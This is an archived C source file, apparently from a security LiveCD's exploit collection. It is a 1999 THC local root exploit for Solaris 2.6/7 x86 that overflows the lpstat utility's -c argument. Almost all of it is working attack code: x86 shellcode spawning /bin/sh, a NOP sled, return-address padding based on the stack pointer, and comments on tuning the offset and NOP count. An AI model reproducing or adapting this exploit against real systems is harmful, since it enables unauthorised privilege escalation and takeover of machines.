home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / lpstat-x86.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  67 lines

  1. /*
  2.  * lpstat sploit for solaris 2.6/7.0
  3.  * by plasmoid/deep/thc <plasmoid@pimmel.com> (c) 1999
  4.  * supported by insected and wilkins
  5.  * 
  6.  * THC - The Hacker's Choice
  7.  * http://thc.inferno.tusculum.edu
  8.  */
  9.  
  10.  
  11.  
  12. #include <unistd.h>
  13. #include <stdio.h>
  14. #include <stdlib.h>
  15. #include <string.h>
  16.  
  17.  
  18. char shell[] =
  19.   "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
  20.   "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
  21.   "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
  22.   "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
  23.   "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
  24.   "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
  25.  
  26. const int buffersize=1100;
  27. const char x86_nop=0x90;
  28. long nop,esp;
  29. long offset=0;
  30. char buffer[2000];
  31.  
  32. long get_esp()
  33. {
  34.   __asm__("movl %esp,%eax");
  35. }
  36.  
  37. int main (int argc, char *argv[])
  38. {
  39.   int i;
  40.  
  41.   /* you shouldn't edit the offset, we run with
  42.      800 nops in 1100 bytes buffer, one of those
  43.      nops should be hit */
  44.  
  45.   if (argc > 1) offset = strtol(argv[1], NULL, 0);
  46.  
  47.   /* if you don't succeed, modify the nop count,
  48.      the standart value of 801 bybtes is quite
  49.      strange enuff */
  50.  
  51.   if (argc > 2) nop = strtoul(argv[2], NULL, 0);
  52.   else
  53.     nop = 801;
  54.  
  55.   esp = get_esp();
  56.  
  57.   memset(buffer, x86_nop, buffersize);
  58.   memcpy(buffer+nop, shell, strlen(shell));
  59.   for (i = nop+strlen(shell); i < buffersize-4; i += 4)
  60.     *((int *) &buffer[i]) = esp+offset;
  61.  
  62.   execl("/usr/bin/lpstat", "lpstat", "-c", buffer, NULL);
  63.  
  64.   printf("exec failed!\n");
  65.   return 0;
  66. }
  67. /*                    www.hack.co.za              [2000]*/